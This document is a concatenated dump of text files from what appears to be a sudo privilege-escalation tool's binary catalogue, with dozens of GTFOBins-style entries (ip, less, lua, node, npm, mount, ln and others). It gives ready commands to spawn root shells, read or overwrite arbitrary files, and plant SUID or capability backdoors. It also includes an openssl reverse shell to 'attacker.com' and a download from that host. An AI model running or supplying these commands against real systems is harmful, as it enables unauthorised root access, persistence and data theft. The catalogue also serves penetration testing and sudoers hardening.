| elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_change 6 | TF=$(mktemp) 7 | sudo install -m 6777 $LFILE $TF 8 | -------------------------------------------------------------------------------- /dbins/ionice.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ionice /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/ip.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo ip -force -batch "$LFILE" 7 | * This only works for Linux with CONFIG_NET_NS=y. 8 | sudo ip netns add foo 9 | sudo ip netns exec foo /bin/sh 10 | sudo ip netns delete foo 11 | * This only works for Linux with CONFIG_NET_NS=y. This version also grants 12 | network access. 13 | sudo ip netns add foo 14 | sudo ip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar 15 | sudo ip netns exec bar /bin/sh 16 | sudo ip netns delete foo 17 | sudo ip netns delete bar 18 | -------------------------------------------------------------------------------- /dbins/irb.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo irb 6 | exec '/bin/bash' 7 | -------------------------------------------------------------------------------- /dbins/ispell.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ispell /etc/passwd 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/jjs.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c \$@|sh 6 | _ echo sh <$(tty) >$(tty) 2>$(tty)').waitFor()" | sudo jjs 7 | -------------------------------------------------------------------------------- /dbins/joe.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo joe 6 | ^K!/bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. 
To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which joe) . 17 | 18 | ./joe 19 | ^K!/bin/sh 20 | -------------------------------------------------------------------------------- /dbins/join.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo join -a 2 /dev/null $LFILE 7 | -------------------------------------------------------------------------------- /dbins/journalctl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo journalctl 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/jq.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo jq -Rr . "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/jrunscript.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo jrunscript -e "exec('/bin/sh -c \$@|sh _ echo sh <$(tty) >$(tty) 2>$ 6 | (tty)')" 7 | -------------------------------------------------------------------------------- /dbins/jtag.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo jtag --interactive 6 | shell /bin/sh 7 | -------------------------------------------------------------------------------- /dbins/julia.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo julia -e 'run(`/bin/sh`)' 6 | -------------------------------------------------------------------------------- /dbins/knife.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo knife exec -E 'exec "/bin/sh"' 6 | -------------------------------------------------------------------------------- /dbins/ksh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo ksh 6 | -------------------------------------------------------------------------------- /dbins/ksshell.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo ksshell -i $LFILE 7 | -------------------------------------------------------------------------------- /dbins/ksu.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ksu -q -e /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/kubectl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=dir_to_serve 6 | sudo kubectl proxy --address=0.0.0.0 --port=4444 --www=$LFILE --www- 7 | prefix=/x/ 8 | -------------------------------------------------------------------------------- /dbins/latexmk.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo latexmk -e 'exec "/bin/sh";' 6 | -------------------------------------------------------------------------------- /dbins/ld.so.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The dynamic loader's path and file name differ by distribution and architecture; use the loader actually present on the target and the exact path the sudoers rule allows. sudo /lib/ld.so /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/less.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo less /etc/profile 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/lftp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo lftp -c '!/bin/sh' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which lftp) . 
16 | 17 | ./lftp -c '!/bin/sh' 18 | -------------------------------------------------------------------------------- /dbins/ln.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Destructive: ln -f overwrites the system's /bin/ln with a symlink to /bin/sh, so the original binary is lost. Back it up first and restore it when done. sudo ln -fs /bin/sh /bin/ln 6 | sudo ln 7 | -------------------------------------------------------------------------------- /dbins/loginctl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo loginctl user-status 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/logsave.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo logsave /dev/null /bin/sh -i 6 | -------------------------------------------------------------------------------- /dbins/look.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo look '' "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/lp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/lp.txt -------------------------------------------------------------------------------- /dbins/ltrace.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ltrace -b -L /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/lua.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo lua -e 'os.execute("/bin/sh")' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which lua) . 
16 | 17 | ./lua -e 'os.execute("/bin/sh")' 18 | -------------------------------------------------------------------------------- /dbins/luatex.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which luatex) . 16 | 17 | ./luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end' 18 | -------------------------------------------------------------------------------- /dbins/lwp-download.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * URL=http://attacker.com/file_to_get 6 | LFILE=file_to_save 7 | sudo lwp-download $URL $LFILE 8 | -------------------------------------------------------------------------------- /dbins/lwp-request.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo lwp-request "file://$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/mail.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * GNU version only. 6 | sudo mail --exec='!/bin/sh' 7 | -------------------------------------------------------------------------------- /dbins/make.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * COMMAND='/bin/sh' 6 | sudo make -s --eval=$'x:\n\t-'"$COMMAND" 7 | -------------------------------------------------------------------------------- /dbins/man.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo man man 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/mawk.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo mawk 'BEGIN {system("/bin/sh")}' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which mawk) . 16 | 17 | ./mawk 'BEGIN {system("/bin/sh")}' 18 | -------------------------------------------------------------------------------- /dbins/minicom.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Start the following command to open the TUI interface, then: 6 | 1. press Ctrl-A o and select Filenames and paths; 7 | 2. press e, type /bin/sh, then Enter; 8 | 3. Press Esc twice; 9 | 4. Press Ctrl-A k to drop the shell. After the shell, exit with Ctrl- 10 | A x. 
11 | sudo minicom -D /dev/null 12 | -------------------------------------------------------------------------------- /dbins/more.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TERM= sudo more /etc/profile 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/mosquitto.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo mosquitto -c "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/mount.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Exploit the fact that mount can be executed via sudo to replace the mount 6 | binary with a shell. 7 | sudo mount -o bind /bin/sh /bin/mount 8 | sudo mount 9 | -------------------------------------------------------------------------------- /dbins/msfconsole.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo msfconsole 6 | msf6 > irb 7 | >> system("/bin/sh") 8 | -------------------------------------------------------------------------------- /dbins/msgattrib.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo msgattrib -P $LFILE 7 | -------------------------------------------------------------------------------- /dbins/msgcat.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo msgcat -P $LFILE 7 | -------------------------------------------------------------------------------- /dbins/msgconv.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo msgconv -P $LFILE 7 | -------------------------------------------------------------------------------- /dbins/msgfilter.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Any text file will do as the input (use -i). kill is needed to spawn the 6 | shell only once. 
7 | echo x | sudo msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID' 8 | -------------------------------------------------------------------------------- /dbins/msgmerge.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo msgmerge -P $LFILE /dev/null 7 | -------------------------------------------------------------------------------- /dbins/msguniq.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo msguniq -P $LFILE 7 | -------------------------------------------------------------------------------- /dbins/mtr.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo mtr --raw -F "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/multitime.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo multitime /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/mv.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_write 6 | TF=$(mktemp) 7 | echo "DATA" > $TF 8 | sudo mv $TF $LFILE 9 | -------------------------------------------------------------------------------- /dbins/mysql.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo mysql -e '\! /bin/sh' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which mysql) . 16 | 17 | ./mysql -e '\! 
/bin/sh' 18 | -------------------------------------------------------------------------------- /dbins/nasm.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo nasm -@ $LFILE 7 | -------------------------------------------------------------------------------- /dbins/nawk.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo nawk 'BEGIN {system("/bin/sh")}' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which nawk) . 16 | 17 | ./nawk 'BEGIN {system("/bin/sh")}' 18 | -------------------------------------------------------------------------------- /dbins/ncdu.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo ncdu 6 | b 7 | -------------------------------------------------------------------------------- /dbins/ncftp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ncftp 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/neofetch.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp) 6 | echo 'exec /bin/sh' >$TF 7 | sudo neofetch --config $TF 8 | -------------------------------------------------------------------------------- /dbins/nft.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo nft -f "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/nice.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo nice /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/nl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo nl -bn -w1 -s '' $LFILE 7 | -------------------------------------------------------------------------------- /dbins/nm.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo nm @$LFILE 7 | -------------------------------------------------------------------------------- /dbins/node.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 6 | 2]})' 7 | ***** Capabilities ***** 8 | If the binary has the Linux CAP_SETUID capability set or it is executed by 9 | another binary with the capability set, it can be used as a backdoor to 10 | maintain privileged access by manipulating its own process UID. 11 | * cp $(which node) . 
12 | sudo setcap cap_setuid+ep node 13 | 14 | ./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", 15 | {stdio: [0, 1, 2]})' 16 | -------------------------------------------------------------------------------- /dbins/nohup.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)" 6 | -------------------------------------------------------------------------------- /dbins/npm.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Additionally, arbitrary script names can be used in place of preinstall 6 | and triggered by name with, e.g., npm -C $TF run preinstall. 7 | TF=$(mktemp -d) 8 | echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json 9 | sudo npm -C $TF --unsafe-perm i 10 | -------------------------------------------------------------------------------- /dbins/nroff.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * TF=$(mktemp -d) 6 | echo '#!/bin/sh' > $TF/groff 7 | echo '/bin/sh' >> $TF/groff 8 | chmod +x $TF/groff 9 | sudo GROFF_BIN_PATH=$TF nroff 10 | -------------------------------------------------------------------------------- /dbins/nsenter.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo nsenter /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/octave.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo octave-cli --eval 'system("/bin/sh")' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which octave) . 
16 | 17 | ./octave-cli --eval 'system("/bin/sh")' 18 | -------------------------------------------------------------------------------- /dbins/od.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo od -An -c -w9999 "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/openssl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * To receive the shell, run the following on the attacker box: 6 | openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 7 | 365 -nodes 8 | openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 9 | Communication between attacker and target will be encrypted. 10 | RHOST=attacker.com 11 | RPORT=12345 12 | mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet - 13 | connect $RHOST:$RPORT > /tmp/s; rm /tmp/s 14 | -------------------------------------------------------------------------------- /dbins/openvpn.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh' 6 | * The file is actually parsed, and the first malformed line is (partially) echoed back 7 | in an error message. 
8 | LFILE=file_to_read 9 | sudo openvpn --config "$LFILE" 10 | -------------------------------------------------------------------------------- /dbins/openvt.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The command execution is blind (its output goes to the virtual console), but it 6 | is possible to save the output to a temporary file. 7 | COMMAND=id 8 | TF=$(mktemp -u) 9 | sudo openvt -- sh -c "$COMMAND >$TF 2>&1" 10 | cat $TF 11 | -------------------------------------------------------------------------------- /dbins/opkg.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * It runs an interactive shell using a specially crafted Debian package. 6 | Generate it with fpm and upload it to the target. 7 | TF=$(mktemp -d) 8 | echo 'exec /bin/sh' > $TF/x.sh 9 | fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF 10 | sudo opkg install x_1.0_all.deb 11 | -------------------------------------------------------------------------------- /dbins/pandoc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
